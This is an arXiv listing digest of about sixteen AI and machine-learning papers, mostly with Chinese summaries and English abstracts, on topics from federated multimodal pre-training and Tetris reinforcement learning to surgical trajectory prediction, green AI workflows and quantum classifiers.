Abstract:The rapid evolution of Multimodal Large Language Models (MLLMs) is bottlenecked by the saturation of high-quality public data, while vast amounts of diverse multimodal data remain inaccessible in privacy-sensitive silos. Federated Learning (FL) offers a promising solution to unlock these distributed resources, but existing research focuses predominantly on fine-tuning, leaving the foundational pre-training phase largely unexplored. In this paper, we formally introduce the Federated MLLM Alignment (Fed-MA) task, a lightweight pre-training paradigm that freezes the vision encoder and LLM while collaboratively training the cross-modal projector. We identify two critical challenges in this setting: (i) parameter interference in aggregating local projectors; and (ii) gradient oscillations in one-pass collaborative SGD. To address these challenges, we propose Fed-CMP, a pioneering framework for federated MLLM pre-training. Fed-CMP employs Canonical Reliability-Aware Aggregation, which constructs a canonical space to decompose client projectors into a shared alignment basis and client-specific coefficients, then performs reliability-weighted fusion to suppress parameter interference. Furthermore, Fed-CMP introduces Orthogonality-Preserved Momentum, which applies momentum to the shared alignment basis via orthogonal projection, accumulating historical optimization directions while preserving geometric structure. We construct four federated pre-training scenarios based on public datasets, and extensive experiments validate that Fed-CMP significantly outperforms existing baselines.
[AI-155] Multiverse: Language-Conditioned Multi-Game Level Blending via Shared Representation
【速读】:该论文旨在解决多游戏场景下文本驱动的关卡生成问题,即如何在不同游戏领域中实现基于自然语言描述的结构化关卡生成,并支持跨游戏关卡的可控融合。传统方法通常局限于单一游戏域,难以捕捉跨游戏间的结构关联。其解决方案的关键在于提出Multiverse模型,通过构建一个共享的潜在空间(shared latent space)来对齐文本指令与关卡结构,并采用基于阈值的多正例对比监督机制(threshold-based multi-positive contrastive supervision),将语义相关的跨游戏关卡进行关联建模。这一表示学习机制使得语言能够指导在混合不同游戏内容时保留特定结构特征,从而实现通过潜在空间插值和组合式文本提示进行可控的零样本关卡生成与融合。
链接: https://arxiv.org/abs/2603.26782
作者: In-Chang Baek,Jiyun Jung,Sung-Hyun Kim,Geum-Hwan Hwang,Kyung-Joong Kim
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 8 pages, 5 figures, 4 tables
Abstract:Text-to-level generation aims to translate natural language descriptions into structured game levels, enabling intuitive control over procedural content generation. While prior text-to-level generators are typically limited to a single game domain, extending language-conditioned generation to multiple games requires learning representations that capture structural relationships across domains. We propose Multiverse, a language-conditioned multi-game level generator that enables cross-game level blending through textual specifications. The model learns a shared latent space aligning textual instructions and level structures, while a threshold-based multi-positive contrastive supervision links semantically related levels across games. This representation allows language to guide which structural characteristics should be preserved when combining content from different games, enabling controllable blending through latent interpolation and zero-shot generation from compositional textual prompts. Experiments show that the learned representation supports controllable cross-game level blending and significantly improves blending quality within the same game genre, while providing a unified representation for language-conditioned multi-game content generation.
[AI-156] ED: Training-Free Experience Distillation for Multimodal Reasoning
【速读】:该论文旨在解决传统知识蒸馏(Knowledge Distillation)方法在资源受限环境中应用受限的问题,即其依赖大量训练数据和重复的参数更新,导致计算成本高、效率低。解决方案的关键在于提出一种无需训练(training-free)、基于上下文的经验蒸馏框架TED(Training-free Experience Distillation),将知识迁移的目标从模型参数转移到学生模型提示(prompt)中注入的“情境经验”(in-context experience)。具体而言,教师模型通过比较学生的多条推理轨迹与自身推理路径及标准答案,提取并持续优化通用的推理经验;同时引入经验压缩机制,通过使用统计追踪选择性合并、重写或删除低效经验,有效控制经验增长和噪声累积。实验表明,在仅用100个样本的情况下,TED显著提升了Qwen3-VL-8B在MathVision和VisualPuzzles上的性能,且训练成本降低5倍以上,实现了高效、低成本的知识迁移。
链接: https://arxiv.org/abs/2603.26778
作者: Shuozhi Yuan,Jinqing Wang,Zihao Liu,Miaomiao Yuan,Haoran Peng,Jin Zhao,Bingwen Wang,Haoyi Wang
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 13 pages,4 figures
Abstract:Knowledge distillation is typically realized by transferring a teacher model’s knowledge into a student’s parameters through supervised or reinforcement-based optimization. While effective, such approaches require repeated parameter updates and large-scale training data, limiting their applicability in resource-constrained environments. In this work, we propose TED, a training-free, context-based distillation framework that shifts the update target of distillation from model parameters to an in-context experience injected into the student’s prompt. For each input, the student generates multiple reasoning trajectories, while a teacher independently produces its own solution. The teacher then compares the student trajectories with its reasoning and the ground-truth answer, extracting generalized experiences that capture effective reasoning patterns. These experiences are continuously refined and updated over time. A key challenge of context-based distillation is unbounded experience growth and noise accumulation. TED addresses this with an experience compression mechanism that tracks usage statistics and selectively merges, rewrites, or removes low-utility experiences. Experiments on multimodal reasoning benchmarks MathVision and VisualPuzzles show that TED consistently improves performance. On MathVision, TED raises the performance of Qwen3-VL-8B from 0.627 to 0.702, and on VisualPuzzles from 0.517 to 0.561 with just 100 training samples. Under this low-data, no-update setting, TED achieves performance competitive with fully trained parameter-based distillation while reducing training cost by over 5x, demonstrating that meaningful knowledge transfer can be achieved through contextual experience.
[AI-157] Bitboard version of Tetris AI
【速读】:该论文旨在解决现有Tetris实现中模拟速度低、状态评估不优以及训练范式效率不足的问题,从而限制了其在大规模强化学习(Reinforcement Learning, RL)研究中的应用。解决方案的关键在于:首先,采用位板(bitboard)优化重构游戏棋盘与方块表示,利用位运算加速核心操作(如碰撞检测、消行和Dellacherie-Thiery特征提取),相较OpenAI Gym-Tetris实现提升53倍运行速度;其次,引入基于事后状态(afterstate)的评价网络结构,简化状态价值估计并减少参数量,优于传统动作价值网络;最后,提出一种缓冲区优化的近端策略优化(Proximal Policy Optimization, PPO)算法,在采样与更新效率之间取得平衡,可在3分钟内于10×10网格上获得平均得分3,829,显著提升了训练效率与性能表现。
链接: https://arxiv.org/abs/2603.26765
作者: Xingguo Chen,Pingshou Xiong,Zhenyu Luo,Mengfei Hu,Xinwen Li,Yongzhou Lü,Guang Yang,Chao Li,Shangdong Yang
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:The efficiency of game engines and policy optimization algorithms is crucial for training reinforcement learning (RL) agents in complex sequential decision-making tasks, such as Tetris. Existing Tetris implementations suffer from low simulation speeds, suboptimal state evaluation, and inefficient training paradigms, limiting their utility for large-scale RL research. To address these limitations, this paper proposes a high-performance Tetris AI framework based on bitboard optimization and improved RL algorithms. First, we redesign the Tetris game board and tetrominoes using bitboard representations, leveraging bitwise operations to accelerate core processes (e.g., collision detection, line clearing, and Dellacherie-Thiery Features extraction) and achieve a 53-fold speedup compared to OpenAI Gym-Tetris. Second, we introduce an afterstate-evaluating actor network that simplifies state value estimation by leveraging Tetris afterstate property, outperforming traditional action-value networks with fewer parameters. Third, we propose a buffer-optimized Proximal Policy Optimization (PPO) algorithm that balances sampling and update efficiency, achieving an average score of 3,829 on 10x10 grids within 3 minutes. Additionally, we develop a Python-Java interface compliant with the OpenAI Gym standard, enabling seamless integration with modern RL frameworks. Experimental results demonstrate that our framework enhances Tetris’s utility as an RL benchmark by bridging low-level bitboard optimizations with high-level AI strategies, providing a sample-efficient and computationally lightweight solution for scalable sequential decision-making research.
[AI-158] raining-Free Diffusion-Driven Modeling of Pareto Set Evolution for Dynamic Multiobjective Optimization
【速读】:该论文旨在解决动态多目标优化问题(Dynamic Multiobjective Optimization Problems, DMOPs)中因目标函数随时间变化导致的帕累托最优解集(Pareto Optimal Solution, POS)漂移难题,尤其是在有限响应时间内难以同时保持收敛性和多样性的问题。现有基于预测的动态多目标进化算法(DMOEAs)通常依赖于训练成本较高的学习模型,或采用单步种群映射策略,忽略了POS演化的渐进特性。论文提出DD-DMOEA,其核心创新在于设计了一种无需训练的基于扩散机制的动态响应方法:将前一环境获得的POS视为“噪声”样本集,通过解析构建的多步去噪过程引导其向当前POS演化;同时引入基于膝点的辅助策略确定新环境中的目标区域,并推导显式的概率密度公式实现无需神经网络训练的去噪更新;此外,为降低膝点预测误差带来的误导风险,进一步设计了不确定性感知机制,根据历史预测偏差自适应调整引导强度。该方案在CEC2018动态基准测试中展现出优于或相当的收敛性与多样性性能,且响应速度更快。
链接: https://arxiv.org/abs/2603.26749
作者: Jian Guan,Huolong Wu,Zhenzhong Wang,Gary G. Yen,Min Jiang
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI)
备注:
Abstract:Dynamic multiobjective optimization problems (DMOPs) feature time-varying objectives, which cause the Pareto optimal solution (POS) set to drift over time and make it difficult to maintain both convergence and diversity under limited response time. Many existing prediction-based dynamic multiobjective evolutionary algorithms (DMOEAs) either depend on learned models with nontrivial training cost or employ one-step population mapping, which may overlook the gradual nature of POS evolution. This paper proposes DD-DMOEA, a training-free diffusion-based dynamic response mechanism for DMOPs. The key idea is to treat the POS obtained in the previous environment as a “noisy” sample set and to guide its evolution toward the current POS through an analytically constructed multi-step denoising process. A knee-point-based auxiliary strategy is used to specify the target region in the new environment, and an explicit probability-density formulation is derived to compute the denoising update without neural training. To reduce the risk of misleading guidance caused by knee-point prediction errors, an uncertainty-aware scheme adaptively adjusts the guidance strength according to the historical prediction deviation. Experiments on the CEC2018 dynamic multiobjective benchmarks show that DD-DMOEA achieves competitive or better convergence-diversity performance and provides faster dynamic response than several state-of-the-art DMOEAs.
[AI-159] LARD 2.0: Enhanced Datasets and Benchmarking for Autonomous Landing Systems
【速读】:该论文旨在解决自主着陆系统开发中因监督学习(Supervised Learning)模型训练数据集局限性而导致的对象检测性能瓶颈问题。其关键解决方案在于:首先,通过引入BingMap航空影像和飞行模拟器等新数据源,显著提升现有数据集生成工具LARD的数据多样性;其次,细化操作设计域(Operational Design Domain, ODD),改善不现实的着陆场景并扩展至多跑道机场环境;最后,构建针对复杂多实例场景下目标检测子任务的评估框架,并提供开源基准模型以量化AI模型性能表现。
链接: https://arxiv.org/abs/2603.26748
作者: Yassine Bougacha,Geoffrey Delhomme,Mélanie Ducoffe,Augustin Fuchs,Jean-Brice Ginestet(DGA),Jacques Girard,Sofiane Kraiem,Franck Mamalet,Vincent Mussot,Claire Pagetti,Thierry Sammour
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:This paper addresses key challenges in the development of autonomous landing systems, focusing on dataset limitations for supervised training of Machine Learning (ML) models for object detection. Our main contributions include: (1) Enhancing dataset diversity, by advocating for the inclusion of new sources such as BingMap aerial images and Flight Simulator, to widen the generation scope of an existing dataset generator used to produce the dataset LARD; (2) Refining the Operational Design Domain (ODD), addressing issues like unrealistic landing scenarios and expanding coverage to multi-runway airports; (3) Benchmarking ML models for autonomous landing systems, introducing a framework for evaluating object detection subtask in a complex multi-instances setting, and providing associated open-source models as a baseline for AI models’ performance.
[AI-160] Capability Safety as Datalog: A Foundational Equivalence
【速读】:该论文旨在解决能力超图(capability hypergraph)框架在实际应用中的两个结构性限制问题:一是缺乏高效的增量维护机制,二是审计表面包含关系缺少决策过程。其解决方案的关键在于证明能力安全(capability safety)可精确表示为命题Datalog求值(Datalogprop),即一阶逻辑中单元、无函数符号且无变量的片段;这一等价性使得原本在原生表述中无法获得的算法和结构结果得以迁移,从而实现了对能力超图的高效处理与形式化验证。
链接: https://arxiv.org/abs/2603.26725
作者: Cosimo Spera
机构: 未知
类目: Logic in Computer Science (cs.LO); Artificial Intelligence (cs.AI)
备注:
Abstract:We prove that capability safety admits an exact representation as propositional Datalog evaluation (Datalogprop: the monadic, ground, function-free fragment of first-order logic), enabling the transfer of algorithmic and structural results unavailable in the native formulation. This addresses two structural limitations of the capability hypergraph framework of Spera [2026]: the absence of efficient incremental maintenance, and the absence of a decision procedure for audit surface containment. The equivalence is tight: capability hypergraphs correspond to exactly this fragment, no more.
[AI-161] Brain-inspired AI for Edge Intelligence: a systematic review
【速读】:该论文旨在解决脉冲神经网络(Spiking Neural Networks, SNNs)在边缘智能部署中面临的“部署悖论”问题,即理论上具有的能耗优势常因异步事件驱动特性难以高效映射到传统冯·诺依曼架构硬件而被抵消。其解决方案的关键在于采用系统级软硬件协同设计视角,聚焦于从量化方法到混合架构等“最后一公里”技术,推动生物合理性向硅基实现的转化;特别强调通过破解训练复杂性(直接学习与转换学习的权衡)、突破状态感知神经元更新的“内存墙”瓶颈,以及填补类脑编译工具链的软件缺口,最终提出构建标准化类脑操作系统(Neuromorphic OS)以弥合同步-异步不匹配,从而实现能源自足的绿色认知基础架构。
链接: https://arxiv.org/abs/2603.26722
作者: Yingchao Cheng,Meijia Wang,Zhifeng Hao,Rajkumar Buyya
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI); Hardware Architecture (cs.AR); Operating Systems (cs.OS)
备注:
Abstract:While Spiking Neural Networks (SNNs) promise to circumvent the severe Size, Weight, and Power (SWaP) constraints of edge intelligence, the field currently faces a “Deployment Paradox” where theoretical energy gains are frequently negated by the inefficiencies of mapping asynchronous, event-driven dynamics onto traditional von Neumann substrates. Transcending the reductionism of algorithm-only reviews, this survey adopts a rigorous system-level hardware-software co-design perspective to examine the 2020-2025 trajectory, specifically targeting the “last mile” technologies - from quantization methodologies to hybrid architectures - that translate biological plausibility into silicon reality. We critically dissect the interplay between training complexity (the dichotomy of direct learning vs. conversion), the “memory wall” bottlenecking stateful neuronal updates, and the critical software gap in neuromorphic compilation toolchains. Finally, we envision a roadmap to reconcile the fundamental “Sync-Async Mismatch,” proposing the development of a standardized Neuromorphic OS as the foundational layer for realizing a ubiquitous, energy-autonomous Green Cognitive Substrate.
[AI-162] SutureAgent : Learning Surgical Trajectories via Goal-conditioned Offline RL in Pixel Space
【速读】:该论文旨在解决机器人辅助缝合中从内窥镜视频直接预测手术缝合针轨迹的问题,现有方法因忽略相邻运动步骤间的序列依赖性以及稀疏的路径点标注导致监督信号不足,难以有效学习真实物理可行的针尖运动。其解决方案的关键在于将针轨迹预测建模为像素空间中的序贯决策问题,将针尖视为逐步移动的智能体,并采用基于立方样条插值的稀疏标注到密集奖励信号转换机制,结合目标条件化的离线强化学习框架(SutureAgent),通过观察编码器捕捉局部空间特征与长程时间动态,以离散方向和连续幅度组合的动作进行自回归预测,同时引入保守Q学习与行为克隆正则化实现稳定策略优化,从而显著提升轨迹预测精度。
链接: https://arxiv.org/abs/2603.26720
作者: Huanrong Liu,Chunlin Tian,Tongyu Jia,Tailai Zhou,Qin Liu,Yu Gao,Yutong Ban,Yun Gu,Guy Rosman,Xin Ma,Qingbiao Li
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:Predicting surgical needle trajectories from endoscopic video is critical for robot-assisted suturing, enabling anticipatory planning, real-time guidance, and safer motion execution. Existing methods that directly learn motion distributions from visual observations tend to overlook the sequential dependency among adjacent motion steps. Moreover, sparse waypoint annotations often fail to provide sufficient supervision, further increasing the difficulty of supervised or imitation learning methods. To address these challenges, we formulate image-based needle trajectory prediction as a sequential decision-making problem, in which the needle tip is treated as an agent that moves step by step in pixel space. This formulation naturally captures the continuity of needle motion and enables the explicit modeling of physically plausible pixel-wise state transitions over time. From this perspective, we propose SutureAgent, a goal-conditioned offline reinforcement learning framework that leverages sparse annotations to dense reward signals via cubic spline interpolation, encouraging the policy to exploit limited expert guidance while exploring plausible future motion paths. SutureAgent encodes variable-length clips using an observation encoder to capture both local spatial cues and long-range temporal dynamics, and autoregressively predicts future waypoints through actions composed of discrete directions and continuous magnitudes. To enable stable offline policy optimization from expert demonstrations, we adopt Conservative Q-Learning with Behavioral Cloning regularization. Experiments on a new kidney wound suturing dataset containing 1,158 trajectories from 50 patients show that SutureAgent reduces Average Displacement Error by 58.6% compared with the strongest baseline, demonstrating the effectiveness of modeling needle trajectory prediction as pixel-level sequential action learning.
[AI-163] On the Carbon Footprint of Economic Research in the Age of Generative AI
【速读】:该论文旨在解决当前Green AI研究中忽视生成式AI(Generative AI)在科研工作流中实际应用环境的问题,即现有评估多聚焦于模型训练阶段的碳足迹,而未充分考量GenAI作为工具嵌入下游计算任务时的整体环境影响。其解决方案的关键在于将分析单位从模型扩展至工作流,并将提示词(prompt)视为决策策略(decision policy),通过设计具有操作约束和决策规则的提示词来控制执行内容与迭代终止条件,从而在保持输出质量不变的前提下显著降低碳排放。实验表明,仅注入通用绿色语言提示无效,而结构化提示可实现稳定且大幅度的碳足迹削减,凸显了“人在回路”治理机制在协调GenAI生产力与环境效率方面的重要作用。
链接: https://arxiv.org/abs/2603.26712
作者: Andres Alonso-Robisco,Carlos Esparcia,Francisco Jareño
机构: 未知
类目: oftware Engineering (cs.SE); Artificial Intelligence (cs.AI); Computers and Society (cs.CY); General Economics (econ.GN)
备注:
Abstract:Generative artificial intelligence (AI) is increasingly used to write and refactor research code, expanding computational workflows. At the same time, Green AI research has largely measured the footprint of models rather than the downstream workflows in which GenAI is a tool. We shift the unit of analysis from models to workflows and treat prompts as decision policies that allocate discretion between researcher and system, governing what is executed and when iteration stops. We contribute in two ways. First, we map the recent Green AI literature into seven themes: training footprint is the largest cluster, while inference efficiency and system level optimisation are growing rapidly, alongside measurement protocols, green algorithms, governance, and security and efficiency trade-offs. Second, we benchmark a modern economic survey workflow, an LDA-based literature mapping implemented with GenAI assisted coding and executed in a fixed cloud notebook, measuring runtime and estimated CO2e with CodeCarbon. Injecting generic green language into prompts has no reliable effect, whereas operational constraints and decision rule prompts deliver large and stable footprint reductions while preserving decision equivalent topic outputs. The results identify human in the loop governance as a practical lever to align GenAI productivity with environmental efficiency.
[AI-164] Physicochemical-Neural Fusion for Semi-Closed-Circuit Respiratory Autonomy in Extreme Environments
【速读】:该论文旨在解决消防员在结构火灾中因呼吸系统供氧受限和气体管理不善而导致的生存时间短、安全风险高的问题。解决方案的关键在于提出了一种基于AI控制的半闭式生命支持系统(Life Support System),其核心创新包括:1)构建了包含热化学一致性、化学计量容量限制、吸附等温线及氧气管理约束的物理化学基础模型;2)设计了一种融合三类传感器信息(外部环境、内部气压与生物指标)的AI控制架构,采用滚动时域模型预测控制(MPC)结合学习型代谢模型和强化学习(RL)策略顾问,并通过控制屏障函数(Control-Barrier Function)安全滤波器确保所有执行器命令的安全性;3)建立仅依赖结构 firefighting 可行传感器的18状态3控制非线性状态空间模型,实现未知任务时长与体能消耗下的最优资源调度。仿真结果表明,该方案相较传统PID控制器可提升18–34%续航能力,同时维持更严格的生理与防火安全边界。
链接: https://arxiv.org/abs/2603.26697
作者: Phillip Kingston,Nicholas Johnston
机构: 未知
类目: ystems and Control (eess.SY); Artificial Intelligence (cs.AI)
备注: 46 pages, 2 figures
Abstract:This paper introduces Galactic Bioware’s Life Support System, a semi-closed-circuit breathing apparatus designed for integration into a positive-pressure firefighting suit and governed by an AI control system. The breathing loop incorporates a soda lime CO2 scrubber, a silica gel dehumidifier, and pure O2 replenishment with finite consumables. One-way exhaust valves maintain positive pressure while creating a semi-closed system in which outward venting gradually depletes the gas inventory. Part I develops the physicochemical foundations from first principles, including state-consistent thermochemistry, stoichiometric capacity limits, adsorption isotherms, and oxygen-management constraints arising from both fire safety and toxicity. Part II introduces an AI control architecture that fuses three sensor tiers, external environmental sensing, internal suit atmosphere sensing (with triple-redundant O2 cells and median voting), and firefighter biometrics. The controller combines receding-horizon model-predictive control (MPC) with a learned metabolic model and a reinforcement learning (RL) policy advisor, with all candidate actuator commands passing through a final control-barrier-function safety filter before reaching the hardware. This architecture is intended to optimize performance under unknown mission duration and exertion profiles. In this paper we introduce an 18-state, 3-control nonlinear state-space formulation using only sensors viable in structural firefighting, with triple-redundant O2 sensing and median voting. Finally, we introduce an MPC framework with a dynamic resource scarcity multiplier, an RL policy advisor for warm-starting, and a final control-barrier-function safety filter through which all actuator commands must pass, demonstrating 18-34% endurance improvement in simulation over PID baselines while maintaining tighter physiological and fire-safety margins.
[AI-165] Learning Energy-Efficient Air–Ground Actuation for Hybrid Robots on Stair-Like Terrain
【速读】:该论文旨在解决混合型空地机器人(hybrid aerial–ground robot)在面对台阶类地形时的能量效率问题:单纯依赖轮式驱动易因地形突变而失效,而纯飞行模式则因小高度提升导致能耗过高。解决方案的关键在于提出一种能量感知的强化学习框架,通过训练单一连续策略(continuous policy)协同控制推进器、车轮与倾角伺服机构,无需预设空中或地面模式;同时利用硬件校准的推力/功耗模型,在奖励函数中直接惩罚真实电能消耗,从而引导策略自发发现“推力辅助行驶”(thrust-assisted driving)这一高效混合运动模式,最终在仿真和硬件平台上均显著降低能耗。
链接: https://arxiv.org/abs/2603.26687
作者: Jiaxing Li,Wen Tian,Xinhang Xu,Junbin Yuan,Sebastian Scherer,Muqing Cao
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:Hybrid aerial–ground robots offer both traversability and endurance, but stair-like discontinuities create a trade-off: wheels alone often stall at edges, while flight is energy-hungry for small height gains. We propose an energy-aware reinforcement learning framework that trains a single continuous policy to coordinate propellers, wheels, and tilt servos without predefined aerial and ground modes. We train policies from proprioception and a local height scan in Isaac Lab with parallel environments, using hardware-calibrated thrust/power models so the reward penalizes true electrical energy. The learned policy discovers thrust-assisted driving that blends aerial thrust and ground traction. In simulation it achieves about 4 times lower energy than propeller-only control. We transfer the policy to a DoubleBee prototype on an 8cm gap-climbing task; it achieves 38% lower average power than a rule-based decoupled controller. These results show that efficient hybrid actuation can emerge from learning and deploy on hardware.
[AI-166] Power Couple? AI Growth and Renewable Energy Investment
【速读】:该论文试图解决的问题是:生成式 AI (Generative AI) 的快速发展是否会推动可再生能源投资以实现碳减排,还是反而会因对电力需求的激增而固化化石能源依赖,即所谓“碳锁定”(carbon lock-in)问题。解决方案的关键在于识别不同规模收益(scaling regimes)和市场激励下,AI发展与可再生能源投资之间的均衡互动机制:当AI能力提升具有超模性(supermodular)且性能提升接近线性时,开发者倾向于追求前沿规模,即使边际电力来自化石能源,此时可再生能源主要缓解算力约束而非直接替代化石发电,形成“适应陷阱”(adaptation trap);反之,若AI面临边际收益递减且能效较低,则能源成本将约束能力选择,此时可再生能源既能支撑AI能力扩展又能实现边际计算的脱碳,形成“适应路径”(adaptation pathway),并可能导向碳中和均衡。因此,有效政策必须确保清洁容量在边际上持续具有约束力,以使脱碳成为均衡结果。
链接: https://arxiv.org/abs/2603.26678
作者: Luyi Gui,Tinglong Dai
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Theoretical Economics (econ.TH)
备注: 32 pages, 5 figures, 11-page appendix
Abstract:AI and renewable energy are increasingly framed as a “power couple” – the idea that surging AI electricity demand will accelerate clean-energy investment – yet concerns persist that AI will instead entrench fossil-fuel carbon lock-in. We reconcile these views by modeling the equilibrium interaction between AI growth and renewable investment. In a parsimonious game, a policymaker invests in renewable capacity available to AI and an AI developer chooses capability; the equilibrium depends on scaling regimes and market incentives. When the market payoff to capability is supermodular and performance gains are near-linear in compute, developers push toward frontier scale even when the marginal megawatt-hour is fossil-based. In this regime, renewable expansion can primarily relax scaling constraints rather than displace fossil generation one-for-one, weakening incentives to build enough clean capacity and reinforcing fossil dependence. This yields an “adaptation trap”: as climate damages rise, the value of AI-enabled adaptation increases, which strengthens incentives to enable frontier scaling while tolerating residual fossil use. When AI faces diminishing returns and lower scaling efficiency, energy costs discipline capability choices; renewable investment then both enables capability and decarbonizes marginal compute, generating an “adaptation pathway” in which climate stress strengthens incentives for clean-capacity expansion and can support a carbon-free equilibrium. A calibrated case study illustrates these mechanisms using observed magnitudes for investment, capability, and energy use. Decarbonizing AI is an equilibrium outcome: effective policy must keep clean capacity binding at the margin as compute expands.
[AI-167] Can AI be a Teaching Partner? Evaluating ChatGPT Gemini and DeepSeek across Three Teaching Strategies
【速读】:该论文旨在解决当前关于大型语言模型(Large Language Models, LLMs)在教育场景中是否具备有效教学能力的实证证据不足的问题。其解决方案的关键在于设计并实施一个系统化的评估协议,聚焦于三种核心教学策略:示例(Examples)、解释与类比(Explanations and Analogies)以及苏格拉底式提问法(Socratic Method),并通过六名人类评审员对ChatGPT、DeepSeek和Gemini三款主流LLM作为教学代理的表现进行量化比较,从而揭示不同模型在 pedagogical skill 上的差异及其对提示(prompt)敏感性的表现。
链接: https://arxiv.org/abs/2603.26673
作者: Talita de Paula Cypriano de Souza,Shruti Mehta,Matheus Arataque Uema,Luciano Bernardes de Paula,Seiji Isotani
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI)
备注:
Abstract:There are growing promises that Large Language Models (LLMs) can support students’ learning by providing explanations, feedback, and guidance. However, despite their rapid adoption and widespread attention, there is still limited empirical evidence regarding the pedagogical skills of LLMs. This article presents a comparative study of popular LLMs, namely, ChatGPT, DeepSeek, and Gemini, acting as teaching agents. An evaluation protocol was developed, focusing on three pedagogical strategies: Examples, Explanations and Analogies, and the Socratic Method. Six human judges conducted the evaluations in the context of teaching the C programming language to beginners. The results indicate that LLM models exhibited similar interaction patterns in the pedagogical strategies of Examples and Explanations and Analogies. In contrast, for the Socratic Method, the models showed greater sensitivity to the pedagogical strategy and the initial prompt. Overall, ChatGPT and Gemini received higher scores, whereas DeepSeek obtained lower scores across the criteria, indicating differences in pedagogical performance across models.
[AI-168] Learning unified control of internal spin squeezing in atomic qudits for magnetometry
【速读】:该论文旨在解决多能级原子在低磁场条件下,由于非线性塞曼(Nonlinear Zeeman, NLZ)效应导致的量子态制备与测量精度受限的问题。NLZ效应虽可作为生成自旋压缩态(spin-squeezed states)的资源,但其随时间演化导致的压缩轴漂移和有效非线性作用变化,会破坏固定读出方式下的测量相关正交分量,从而限制了可实现的计量增益。解决方案的关键在于引入物理信息强化学习(physics-informed reinforcement learning),通过仅利用实验可测的低阶自旋矩(low-order spin moments)训练智能体,在$ f=21/2 $能级结构中发现统一的控制策略,该策略不仅能快速制备强压缩的内部量子态,还能在持续存在的NLZ演化下稳定超过4 dB的固定轴自旋压缩;结合态制备开销后,单原子磁灵敏度达13.9 pT/√Hz,相较标准量子极限提升约3 dB,证明了将不可避免的内在非线性动力学转化为可操作的计量优势是可行的。
链接: https://arxiv.org/abs/2603.28421
作者: C. Z. Cao,J. Z. Han,M. Xiong,M. Deng,L. Wang,X. Lv,M. Xue
机构: 未知
类目: Quantum Physics (quant-ph); Artificial Intelligence (cs.AI)
备注: (6.5+2.5+2) pages, 4 figures
Abstract:Generating and preserving metrologically useful quantum states is a central challenge in quantum-enhanced atomic magnetometry. In multilevel atoms operated in the low-field regime, the nonlinear Zeeman (NLZ) effect is both a resource and a limitation. It nonlinearly redistributes internal spin fluctuations to generate spin-squeezed states within a single atomic qudit, yet under fixed readout it distorts the measurement-relevant quadrature and limits the accessible metrological gain. This challenge is compounded by the time dependence of both the squeezing axis and the effective nonlinear action. Here we show that physics-informed reinforcement learning can transform NLZ dynamics from a source of readout degradation into a sustained metrological resource. Using only experimentally accessible low-order spin moments, a trained agent identifies, in the f=21/2 manifold of ^161\mathrmDy , a unified control policy that rapidly prepares strongly squeezed internal states and stabilizes more than 4,\mathrmdB of fixed-axis spin squeezing under always-on NLZ evolution. Including state-preparation overhead, the learned protocol yields a single-atom magnetic sensitivity of 13.9,\mathrmpT/\sqrt\mathrmHz , corresponding to an advantage of approximately 3,\mathrmdB beyond the standard quantum limit. Our results establish learning-based control as a practical route for converting unavoidable intrinsic nonlinear dynamics in multilevel quantum sensors into operational metrological advantage.
[AI-169] Q-DIVER: Integrated Quantum Transfer Learning and Differentiable Quantum Architecture Search with EEG Data
【速读】:该论文旨在解决将量子电路(quantum circuit)集成到深度学习流水线中的挑战,特别是由于传统启发式设计方法在灵活性和效率上的局限性。其解决方案的关键在于提出了一种名为Q-DIVER的混合框架,该框架结合了大规模预训练脑电图(EEG)编码器(DIVER-1)与可微量子分类器,并引入可微量子架构搜索(Differentiable Quantum Architecture Search),在端到端微调过程中自主发现任务最优的量子电路拓扑结构,从而实现参数高效的量子迁移学习,显著减少任务特定头参数数量(约50倍),同时保持与经典多层感知机相当的预测性能(PhysioNet Motor Imagery数据集上测试F1为63.49%)。
链接: https://arxiv.org/abs/2603.28122
作者: Junghoon Justin Park,Yeonghyeon Park,Jiook Cha
机构: 未知
类目: Quantum Physics (quant-ph); Artificial Intelligence (cs.AI)
备注:
Abstract:Integrating quantum circuits into deep learning pipelines remains challenging due to heuristic design limitations. We propose Q-DIVER, a hybrid framework combining a large-scale pretrained EEG encoder (DIVER-1) with a differentiable quantum classifier. Unlike fixed-ansatz approaches, we employ Differentiable Quantum Architecture Search to autonomously discover task-optimal circuit topologies during end-to-end fine-tuning. On the PhysioNet Motor Imagery dataset, our quantum classifier achieves predictive performance comparable to classical multi-layer perceptrons (Test F1: 63.49%) while using approximately \textbf50 \times fewer task-specific head parameters (2.10M vs. 105.02M). These results validate quantum transfer learning as a parameter-efficient strategy for high-dimensional biological signal processing.
[AI-170] AI-ready design of realistic 2D materials and interfaces with Mat3ra-2D
【速读】:该论文旨在解决当前人工智能(AI)与机器学习(ML)模型在材料科学中普遍依赖理想体相晶体训练数据,导致其在真实应用场景中迁移能力受限的问题,尤其针对表面、界面和缺陷主导的实际体系缺乏有效建模工具。解决方案的关键在于提出Mat3ra-2D——一个开源框架,通过两个核心机制实现:(1) 建立标准化的数据存储与交换规范,并模块化封装材料结构的核心概念;(2) 构建基于配置生成器流水线(configuration-builder pipelines)的转换工作流,确保结构生成过程中的溯源性(provenance)与元数据完整性。该框架支持包含无序性和缺陷驱动复杂性的二维材料及异质界面结构的快速设计,且以可复现的Jupyter笔记本形式提供典型任务模板(如取向特定 slab 或应变匹配界面构建),并具备浏览器端运行能力,便于集成至Web应用,从而系统性地构建面向AI/ML的现实二维材料与界面数据集。
链接: https://arxiv.org/abs/2603.27886
作者: Vsevolod Biryukov,Kamal Choudhary,Timur Bazhirov
机构: 未知
类目: Materials Science (cond-mat.mtrl-sci); Artificial Intelligence (cs.AI); Computational Physics (physics.comp-ph)
备注: 23 pages, 7 figures, 1 table
